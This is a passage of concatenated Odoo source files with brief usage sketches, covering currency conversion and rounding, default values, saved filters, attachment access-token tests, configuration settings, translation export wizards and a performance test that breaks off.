""" Discard all the defaults for any of the given values. """
field = self.env['ir.model.fields']._get(model_name, field_name)
json_vals = [json.dumps(value, ensure_ascii=False) for value in values]
domain = [('field_id', '=', field.id), ('json_value', 'in', json_vals)]
return self.search(domain).unlink()
```
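The scope rules of `set()` / `get()` above (``True`` meaning the current user or the current user's company, ``False`` meaning all) are easier to see in a usage sketch. This assumes an Odoo environment `env`; the model, field and values are illustrative only.

```python
# Minimal sketch, assuming an Odoo environment `env`; model/field/values are illustrative.
IrDefault = env['ir.default']

# Company-level default: applies to every user of the current user's company.
IrDefault.set('res.partner', 'lang', 'en_US', company_id=True)

# User-level default: overrides the company-level one for the current user.
IrDefault.set('res.partner', 'lang', 'fr_FR', user_id=True)

# get() matches the exact (user, company, condition) scope and decodes the JSON value.
print(IrDefault.get('res.partner', 'lang', user_id=True))     # expected: 'fr_FR'
print(IrDefault.get('res.partner', 'lang', company_id=True))  # expected: 'en_US'

# get_model_defaults() merges the scopes, keeping the highest-priority value per field.
print(IrDefault.get_model_defaults('res.partner'))            # expected: {'lang': 'fr_FR'}
```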
#### File: base/models/res_currency.py
```python
import logging
import math
import re
import time
import traceback
from odoo import api, fields, models, tools, _
_logger = logging.getLogger(__name__)
try:
from num2words import num2words
except ImportError:
_logger.warning("The num2words python library is not installed, amount-to-text features won't be fully available.")
num2words = None
CURRENCY_DISPLAY_PATTERN = re.compile(r'(\w+)\s*(?:\((.*)\))?')
class Currency(models.Model):
_name = "res.currency"
_description = "Currency"
_order = 'active desc, name'
# Note: 'code' column was removed as of v6.0, the 'name' should now hold the ISO code.
name = fields.Char(string='Currency', size=3, required=True, help="Currency Code (ISO 4217)")
symbol = fields.Char(help="Currency sign, to be used when printing amounts.", required=True)
rate = fields.Float(compute='_compute_current_rate', string='Current Rate', digits=(12, 6),
help='The rate of the currency to the currency of rate 1.')
rate_ids = fields.One2many('res.currency.rate', 'currency_id', string='Rates')
rounding = fields.Float(string='Rounding Factor', digits=(12, 6), default=0.01)
decimal_places = fields.Integer(compute='_compute_decimal_places', store=True)
active = fields.Boolean(default=True)
position = fields.Selection([('after', 'After Amount'), ('before', 'Before Amount')], default='after',
string='Symbol Position', help="Determines whether the currency symbol should be placed before or after the amount.")
date = fields.Date(compute='_compute_date')
currency_unit_label = fields.Char(string="Currency Unit", help="Currency Unit Name")
currency_subunit_label = fields.Char(string="Currency Subunit", help="Currency Subunit Name")
_sql_constraints = [
('unique_name', 'unique (name)', 'The currency code must be unique!'),
('rounding_gt_zero', 'CHECK (rounding>0)', 'The rounding factor must be greater than 0!')
]
def _get_rates(self, company, date):
query = """SELECT c.id,
COALESCE((SELECT r.rate FROM res_currency_rate r
WHERE r.currency_id = c.id AND r.name <= %s
AND (r.company_id IS NULL OR r.company_id = %s)
ORDER BY r.company_id, r.name DESC
LIMIT 1), 1.0) AS rate
FROM res_currency c
WHERE c.id IN %s"""
self._cr.execute(query, (date, company.id, tuple(self.ids)))
currency_rates = dict(self._cr.fetchall())
return currency_rates
@api.multi
@api.depends('rate_ids.rate')
def _compute_current_rate(self):
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
# the subquery selects the last rate before 'date' for the given currency/company
currency_rates = self._get_rates(company, date)
for currency in self:
currency.rate = currency_rates.get(currency.id) or 1.0
@api.multi
@api.depends('rounding')
def _compute_decimal_places(self):
for currency in self:
if 0 < currency.rounding < 1:
currency.decimal_places = int(math.ceil(math.log10(1/currency.rounding)))
else:
currency.decimal_places = 0
@api.multi
@api.depends('rate_ids.name')
def _compute_date(self):
for currency in self:
currency.date = currency.rate_ids[:1].name
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
results = super(Currency, self)._name_search(name, args, operator=operator, limit=limit, name_get_uid=name_get_uid)
if not results:
name_match = CURRENCY_DISPLAY_PATTERN.match(name)
if name_match:
results = super(Currency, self)._name_search(name_match.group(1), args, operator=operator, limit=limit, name_get_uid=name_get_uid)
return results
@api.multi
def name_get(self):
return [(currency.id, tools.ustr(currency.name)) for currency in self]
@api.multi
def amount_to_text(self, amount):
self.ensure_one()
def _num2words(number, lang):
try:
return num2words(number, lang=lang).title()
except NotImplementedError:
return num2words(number, lang='en').title()
if num2words is None:
logging.getLogger(__name__).warning("The library 'num2words' is missing, cannot render textual amounts.")
return ""
formatted = "%.{0}f".format(self.decimal_places) % amount
parts = formatted.partition('.')
integer_value = int(parts[0])
fractional_value = int(parts[2] or 0)
lang_code = self.env.context.get('lang') or self.env.user.lang
lang = self.env['res.lang'].with_context(active_test=False).search([('code', '=', lang_code)])
amount_words = tools.ustr('{amt_value} {amt_word}').format(
amt_value=_num2words(integer_value, lang=lang.iso_code),
amt_word=self.currency_unit_label,
)
if not self.is_zero(amount - integer_value):
amount_words += ' ' + _('and') + tools.ustr(' {amt_value} {amt_word}').format(
amt_value=_num2words(fractional_value, lang=lang.iso_code),
amt_word=self.currency_subunit_label,
)
return amount_words
@api.multi
def round(self, amount):
"""Return ``amount`` rounded according to ``self``'s rounding rules.
:param float amount: the amount to round
:return: rounded float
"""
# TODO: Need to check why sale.py's _amount_all() calls round() with *no* ID after the commits below,
# https://github.com/odoo/odoo/commit/36ee1ad813204dcb91e9f5f20d746dff6f080ac2
# https://github.com/odoo/odoo/commit/0b6058c585d7d9a57bd7581b8211f20fca3ec3f7
# Removing self.ensure_one() will cause a few test cases in the event_sale, sale_mrp and stock_dropshipping modules to break.
#self.ensure_one()
return tools.float_round(amount, precision_rounding=self.rounding)
@api.multi
def compare_amounts(self, amount1, amount2):
"""Compare ``amount1`` and ``amount2`` after rounding them according to the
given currency's precision.
An amount is considered lower/greater than another amount if their rounded
values differ. This is not the same as having a non-zero difference!
For example 1.432 and 1.431 are equal at 2 digits precision,
so this method would return 0.
However 0.006 and 0.002 are considered different (returns 1) because
they respectively round to 0.01 and 0.0, even though
0.006-0.002 = 0.004 which would be considered zero at 2 digits precision.
:param float amount1: first amount to compare
:param float amount2: second amount to compare
:return: (resp.) -1, 0 or 1, if ``amount1`` is (resp.) lower than,
equal to, or greater than ``amount2``, according to
``currency``'s rounding.
With the new API, call it like: ``currency.compare_amounts(amount1, amount2)``.
"""
return tools.float_compare(amount1, amount2, precision_rounding=self.rounding)
@api.multi
def is_zero(self, amount):
"""Returns true if ``amount`` is small enough to be treated as
zero according to current currency's rounding rules.
Warning: ``is_zero(amount1-amount2)`` is not always equivalent to
``compare_amounts(amount1,amount2) == 0``, as the former will round after
computing the difference, while the latter will round before, giving
different results for e.g. 0.006 and 0.002 at 2 digits precision.
:param float amount: amount to compare with currency's zero
With the new API, call it like: ``currency.is_zero(amount)``.
"""
return tools.float_is_zero(amount, precision_rounding=self.rounding)
@api.model
def _get_conversion_rate(self, from_currency, to_currency, company, date):
currency_rates = (from_currency + to_currency)._get_rates(company, date)
res = currency_rates.get(to_currency.id) / currency_rates.get(from_currency.id)
return res
def _convert(self, from_amount, to_currency, company, date, round=True):
"""Returns the converted amount of ``from_amount``` from the currency
``self`` to the currency ``to_currency`` for the given ``date`` and
company.
:param company: The company from which we retrieve the conversion rate
:param date: The nearest date from which we retrieve the conversion rate.
:param round: Round the result or not
"""
self, to_currency = self or to_currency, to_currency or self
assert self, "convert amount from unknown currency"
assert to_currency, "convert amount to unknown currency"
assert company, "convert amount from unknown company"
assert date, "convert amount from unknown date"
# apply conversion rate
if self == to_currency:
to_amount = from_amount
else:
to_amount = from_amount * self._get_conversion_rate(self, to_currency, company, date)
# apply rounding
return to_currency.round(to_amount) if round else to_amount
@api.model
def _compute(self, from_currency, to_currency, from_amount, round=True):
_logger.warning('The `_compute` method is deprecated. Use `_convert` instead')
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
return from_currency._convert(from_amount, to_currency, company, date)
@api.multi
def compute(self, from_amount, to_currency, round=True):
_logger.warning('The `compute` method is deprecated. Use `_convert` instead')
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
return self._convert(from_amount, to_currency, company, date)
def _select_companies_rates(self):
return """
SELECT
r.currency_id,
COALESCE(r.company_id, c.id) as company_id,
r.rate,
r.name AS date_start,
(SELECT name FROM res_currency_rate r2
WHERE r2.name > r.name AND
r2.currency_id = r.currency_id AND
(r2.company_id is null or r2.company_id = c.id)
ORDER BY r2.name ASC
LIMIT 1) AS date_end
FROM res_currency_rate r
JOIN res_company c ON (r.company_id is null or r.company_id = c.id)
"""
class CurrencyRate(models.Model):
_name = "res.currency.rate"
_description = "Currency Rate"
_order = "name desc"
name = fields.Date(string='Date', required=True, index=True,
default=lambda self: fields.Date.today())
rate = fields.Float(digits=(12, 6), default=1.0, help='The rate of the currency to the currency of rate 1')
currency_id = fields.Many2one('res.currency', string='Currency', readonly=True)
company_id = fields.Many2one('res.company', string='Company',
default=lambda self: self.env.user.company_id)
_sql_constraints = [
('unique_name_per_day', 'unique (name,currency_id,company_id)', 'Only one currency rate per day allowed!'),
('currency_rate_check', 'CHECK (rate>0)', 'The currency rate must be strictly positive.'),
]
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if operator in ['=', '!=']:
try:
date_format = '%Y-%m-%d'
if self._context.get('lang'):
lang_id = self.env['res.lang']._search([('code', '=', self._context['lang'])], access_rights_uid=name_get_uid)
if lang_id:
date_format = self.browse(lang_id).date_format
name = time.strftime('%Y-%m-%d', time.strptime(name, date_format))
except ValueError:
try:
args.append(('rate', operator, float(name)))
except ValueError:
return []
name = ''
operator = 'ilike'
return super(CurrencyRate, self)._name_search(name, args=args, operator=operator, limit=limit, name_get_uid=name_get_uid)
```
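The rounding semantics documented in `compare_amounts()` and `is_zero()` above are subtle enough to deserve a worked sketch. This assumes an Odoo environment `env` where the standard `base.USD` / `base.EUR` currency records exist; amounts are illustrative.

```python
# Minimal sketch, assuming an Odoo environment `env`; amounts are illustrative.
from odoo import fields

usd = env.ref('base.USD')
eur = env.ref('base.EUR')
company = env.user.company_id
today = fields.Date.today()

# Convert 100 USD into EUR at the rate effective on `today` for `company`.
amount_eur = usd._convert(100.0, eur, company, today)

# compare_amounts() rounds each operand first: 0.006 -> 0.01 and 0.002 -> 0.00, so they differ.
assert eur.compare_amounts(0.006, 0.002) == 1

# is_zero() rounds the difference instead: 0.004 rounds to 0.00 at 2 decimal places.
assert eur.is_zero(0.006 - 0.002)
```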
#### File: base/tests/test_ir_filters.py
```python
from odoo import exceptions
from odoo.tests.common import TransactionCase, ADMIN_USER_ID
def noid(seq):
""" Removes values that are not relevant for the test comparisons """
for d in seq:
d.pop('id', None)
d.pop('action_id', None)
return seq
class FiltersCase(TransactionCase):
def build(self, model, *args):
Model = self.env[model].sudo(ADMIN_USER_ID)
for vals in args:
Model.create(vals)
class TestGetFilters(FiltersCase):
def setUp(self):
super(TestGetFilters, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_own_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=self.USER_ID, model_id='ir.filters'))
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='b', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='d', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
])
def test_global_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
dict(name='c', user_id=False, model_id='ir.filters'),
dict(name='d', user_id=False, model_id='ir.filters'),
)
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='b', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='d', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
])
def test_no_third_party_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=ADMIN_USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=ADMIN_USER_ID, model_id='ir.filters') )
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
])
class TestOwnDefaults(FiltersCase):
def setUp(self):
super(TestOwnDefaults, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_new_no_filter(self):
"""
When creating a @is_default filter with no existing filter, that new
filter gets the default flag
"""
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=True,
domain='[]', context='{}', sort='[]')
])
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, the flag should be *moved* from the old to the new filter
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if another filter
already has the flag, the flag should be moved
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
])
class TestGlobalDefaults(FiltersCase):
def setUp(self):
super(TestGlobalDefaults, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=False, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if another filter
already has the flag, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_default_filter(self):
"""
Replacing the current default global filter should not generate any error
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
context_value = "{'some_key': True}"
Filters.create_or_replace({
'name': 'b',
'model_id': 'ir.filters',
'user_id': False,
'context': context_value,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=False, is_default=True, domain='[]', context=context_value, sort='[]'),
])
class TestReadGroup(TransactionCase):
"""Test function read_group with groupby on a many2one field to a model
(in test, "user_id" to "res.users") which is ordered by an inherited not stored field (in
test, "name" inherited from "res.partners").
"""
def test_read_group_1(self):
Users = self.env['res.users']
self.assertEqual(Users._order, "name, login", "Model res.users must be ordered by name, login")
self.assertFalse(Users._fields['name'].store, "Field name is not stored in res.users")
Filters = self.env['ir.filters']
filter_a = Filters.create(dict(name="Filter_A", model_id="ir.filters"))
filter_b = Filters.create(dict(name="Filter_B", model_id="ir.filters"))
filter_b.write(dict(user_id=False))
res = Filters.read_group([], ['name', 'user_id'], ['user_id'])
self.assertTrue(any(val['user_id'] == False for val in res), "At least one group must contain val['user_id'] == False.")
```
#### File: base/tests/test_ir_http.py
```python
from odoo.tests import common
import odoo
GIF = b"R0lGODdhAQABAIAAAP///////ywAAAAAAQABAAACAkQBADs="
class test_ir_http_mimetype(common.TransactionCase):
def test_ir_http_mimetype_attachment(self):
""" Test mimetype for attachment """
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test mimetype gif',
'datas_fname': 'file.gif'})
status, headers, content = self.env['ir.http'].binary_content(
id=attachment.id,
mimetype=None,
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_mimetype_attachment_name(self):
""" Test mimetype for attachment with bad name"""
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test mimetype gif with png name',
'datas_fname': 'file.png'})
status, headers, content = self.env['ir.http'].binary_content(
id=attachment.id,
mimetype=None,
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
# TODO: fix and change it in master, should be image/gif
self.assertEqual(mimetype, 'image/png')
def test_ir_http_mimetype_basic_field(self):
""" Test mimetype for classic field """
partner = self.env['res.partner'].create({
'image': GIF,
'name': 'Test mimetype basic field',
})
status, headers, content = self.env['ir.http'].binary_content(
model='res.partner',
id=partner.id,
field='image',
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_mimetype_computed_field(self):
""" Test mimetype for computed field wich resize picture"""
prop = self.env['ir.property'].create({
'fields_id': self.env['ir.model.fields'].search([], limit=1).id,
'name': "Property binary",
'value_binary': GIF,
'type': 'binary',
})
resized = odoo.tools.image_get_resized_images(prop.value_binary, return_big=True, avoid_resize_medium=True)['image_small']
# Simulate a computed field which resizes the image and is not attachment=True (e.g. on product)
prop.write({'value_binary': resized})
status, headers, content = self.env['ir.http'].binary_content(
model='ir.property',
id=prop.id,
field='value_binary',
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_attachment_access(self):
""" Test attachment access with and without access token """
public_user = self.env.ref('base.public_user')
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test valid access token with image',
'datas_fname': 'image.gif'
})
defaults = {
'id': attachment.id,
'default_mimetype': 'image/gif',
'env': public_user.sudo(public_user.id).env,
}
def test_access(**kwargs):
status, _, _ = self.env['ir.http'].binary_content(
**dict(defaults, **kwargs)
)
return status
status = test_access()
self.assertEqual(status, 403, "no access")
status = test_access(access_token=u'Secret')
self.assertEqual(status, 403,
"no access if access token for attachment without access token")
attachment.access_token = u'Secret'
status = test_access(access_token=u'Secret')
self.assertEqual(status, 200, "access for correct access token")
status = test_access(access_token=u'Wrong')
self.assertEqual(status, 403, "no access for wrong access token")
attachment.public = True
status = test_access()
self.assertEqual(status, 200, "access for attachment with access")
status = test_access(access_token=u'Wrong')
self.assertEqual(status, 403,
"no access for wrong access token for attachment with access")
attachment.unlink()
status = test_access()
self.assertEqual(status, 404, "no access for deleted attachment")
status = test_access(access_token=u'Secret')
self.assertEqual(status, 404,
"no access with access token for deleted attachment")
```
#### File: base/tests/test_res_config.py
```python
import logging
from odoo import exceptions
from odoo.tests.common import TransactionCase, tagged
from odoo.tools import pycompat
_logger = logging.getLogger(__name__)
class TestResConfig(TransactionCase):
def setUp(self):
super(TestResConfig, self).setUp()
self.ResConfig = self.env['res.config.settings']
# Define the test values
self.menu_xml_id = 'base.menu_action_res_users'
self.full_field_name = 'res.partner.lang'
self.error_msg = "WarningRedirect test string: %(field:res.partner.lang)s - %(menu:base.menu_action_res_users)s."
self.error_msg_wo_menu = "WarningRedirect test string: %(field:res.partner.lang)s."
# Note: see the get_config_warning() doc for a better example
# Fetch the expected values
menu = self.env.ref(self.menu_xml_id)
model_name, field_name = self.full_field_name.rsplit('.', 1)
self.expected_path = menu.complete_name
self.expected_action_id = menu.action.id
self.expected_name = self.env[model_name].fields_get([field_name])[field_name]['string']
self.expected_final_error_msg = self.error_msg % {
'field:res.partner.lang': self.expected_name,
'menu:base.menu_action_res_users': self.expected_path
}
self.expected_final_error_msg_wo_menu = self.error_msg_wo_menu % {
'field:res.partner.lang': self.expected_name,
}
def test_00_get_option_path(self):
""" The get_option_path() method should return a tuple containing a string and an integer """
res = self.ResConfig.get_option_path(self.menu_xml_id)
# Check types
self.assertIsInstance(res, tuple)
self.assertEqual(len(res), 2, "The result should contain 2 elements")
self.assertIsInstance(res[0], pycompat.string_types)
self.assertIsInstance(res[1], pycompat.integer_types)
# Check returned values
self.assertEqual(res[0], self.expected_path)
self.assertEqual(res[1], self.expected_action_id)
def test_10_get_option_name(self):
""" The get_option_name() method should return a string """
res = self.ResConfig.get_option_name(self.full_field_name)
# Check type
self.assertIsInstance(res, pycompat.string_types)
# Check returned value
self.assertEqual(res, self.expected_name)
def test_20_get_config_warning(self):
""" The get_config_warning() method should return a RedirectWarning """
res = self.ResConfig.get_config_warning(self.error_msg)
# Check type
self.assertIsInstance(res, exceptions.RedirectWarning)
# Check returned value
self.assertEqual(res.args[0], self.expected_final_error_msg)
self.assertEqual(res.args[1], self.expected_action_id)
def test_30_get_config_warning_wo_menu(self):
""" The get_config_warning() method should return a Warning exception """
res = self.ResConfig.get_config_warning(self.error_msg_wo_menu)
# Check type
self.assertIsInstance(res, exceptions.Warning)
# Check returned value
self.assertEqual(res.args[0], self.expected_final_error_msg_wo_menu)
@tagged('post_install', '-at_install')
class TestResConfigExecute(TransactionCase):
def test_01_execute_res_config(self):
"""
Try to create and execute all res_config models. Target settings that can't be
loaded or saved, and avoid the remaining `get_default_foo` or `set_foo` methods
that won't be executed if foo != `fields`.
"""
all_config_settings = self.env['ir.model'].search([('name', 'like', 'config.settings')])
for config_settings in all_config_settings:
_logger.info("Testing %s" % (config_settings.name))
self.env[config_settings.name].create({}).execute()
```
#### File: base/wizard/base_export_language.py
```python
import base64
import contextlib
import io
from odoo import api, fields, models, tools, _
NEW_LANG_KEY = '__new__'
class BaseLanguageExport(models.TransientModel):
_name = "base.language.export"
_description = 'Language Export'
@api.model
def _get_languages(self):
langs = self.env['res.lang'].search([('translatable', '=', True)])
return [(NEW_LANG_KEY, _('New Language (Empty translation template)'))] + \
[(lang.code, lang.name) for lang in langs]
name = fields.Char('File Name', readonly=True)
lang = fields.Selection(_get_languages, string='Language', required=True, default=NEW_LANG_KEY)
format = fields.Selection([('csv','CSV File'), ('po','PO File'), ('tgz', 'TGZ Archive')],
string='File Format', required=True, default='csv')
modules = fields.Many2many('ir.module.module', 'rel_modules_langexport', 'wiz_id', 'module_id',
string='Apps To Export', domain=[('state','=','installed')])
data = fields.Binary('File', readonly=True)
state = fields.Selection([('choose', 'choose'), ('get', 'get')], # choose language or get the file
default='choose')
@api.multi
def act_getfile(self):
this = self[0]
lang = this.lang if this.lang != NEW_LANG_KEY else False
mods = sorted(this.mapped('modules.name')) or ['all']
with contextlib.closing(io.BytesIO()) as buf:
tools.trans_export(lang, mods, buf, this.format, self._cr)
out = base64.encodestring(buf.getvalue())
filename = 'new'
if lang:
filename = tools.get_iso_codes(lang)
elif len(mods) == 1:
filename = mods[0]
extension = this.format
if not lang and extension == 'po':
extension = 'pot'
name = "%s.%s" % (filename, extension)
this.write({'state': 'get', 'data': out, 'name': name})
return {
'type': 'ir.actions.act_window',
'res_model': 'base.language.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
```
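For completeness, a minimal sketch of how the export wizard above is typically driven from code, assuming an Odoo environment `env` with the fr_FR language installed; values are illustrative.

```python
# Minimal sketch, assuming an Odoo environment `env` and an installed fr_FR language.
wizard = env['base.language.export'].create({'lang': 'fr_FR', 'format': 'po'})
wizard.act_getfile()
# After the call the wizard is in state 'get': `data` holds the base64-encoded PO
# export and `name` is derived from the ISO code and format, e.g. 'fr.po'.
print(wizard.state, wizard.name)
```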
#### File: base/wizard/base_update_translations.py
```python
import tempfile
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
class BaseUpdateTranslations(models.TransientModel):
_name = 'base.update.translations'
_description = 'Update Translations'
@api.model
def _get_languages(self):
langs = self.env['res.lang'].search([('active', '=', True), ('translatable', '=', True)])
return [(lang.code, lang.name) for lang in langs]
lang = fields.Selection(_get_languages, 'Language', required=True)
@api.model
def _get_lang_name(self, lang_code):
lang = self.env['res.lang'].search([('code', '=', lang_code)], limit=1)
if not lang:
raise UserError(_('No language with code "%s" exists') % lang_code)
return lang.name
@api.multi
def act_update(self):
this = self[0]
lang_name = self._get_lang_name(this.lang)
with tempfile.NamedTemporaryFile() as buf:
tools.trans_export(this.lang, ['all'], buf, 'po', self._cr)
context = {'create_empty_translation': True}
tools.trans_load_data(self._cr, buf, 'po', this.lang, lang_name=lang_name, context=context)
return {'type': 'ir.actions.act_window_close'}
```
#### File: addons/test_access_rights/models.py
```python
from odoo import fields, models
class SomeObj(models.Model):
_name = 'test_access_right.some_obj'
_description = 'Object For Test Access Right'
val = fields.Integer()
categ_id = fields.Many2one('test_access_right.obj_categ')
class Container(models.Model):
_name = 'test_access_right.container'
_description = 'Test Access Right Container'
some_ids = fields.Many2many('test_access_right.some_obj', 'test_access_right_rel', 'container_id', 'some_id')
class ObjCateg(models.Model):
_name = 'test_access_right.obj_categ'
_description = "Context dependent searchable model"
name = fields.Char(required=True)
def search(self, args, **kwargs):
if self.env.context.get('only_media'):
args += [('name', '=', 'Media')]
return super(ObjCateg, self).search(args, **kwargs)
```
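The `search()` override on `ObjCateg` above makes results depend on the caller's context. A small sketch of what that means in practice, assuming an Odoo environment `env`; the category names are illustrative.

```python
# Minimal sketch, assuming an Odoo environment `env`; category names are illustrative.
Categ = env['test_access_right.obj_categ']
Categ.create({'name': 'Media'})
Categ.create({'name': 'Books'})

print(Categ.search([]).mapped('name'))                                # contains 'Media' and 'Books'
print(Categ.with_context(only_media=True).search([]).mapped('name'))  # only 'Media' records
```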
#### File: test_performance/tests/test_performance.py
```python
from collections import defaultdict
import json
from odoo.tests.common import TransactionCase, users, warmup
from odoo.tools import pycompat
class TestPerformance(TransactionCase):
@users('__system__', 'demo')
@warmup
def test_read_base(self):
""" Read records. """
records = self.env['test_performance.base'].search([])
self.assertEqual(len(records), 5)
with self.assertQueryCount(__system__=3, demo=3):
# without cache
for record in records:
record.partner_id.country_id.name
with self.assertQueryCount(0):
# with cache
for record in records:
record.partner_id.country_id.name
with self.assertQueryCount(0):
# value_pc must have been prefetched, too
for record in records:
record.value_pc
@users('__system__', 'demo')
@warmup
def test_write_base(self):
""" Write records (no recomputation). """
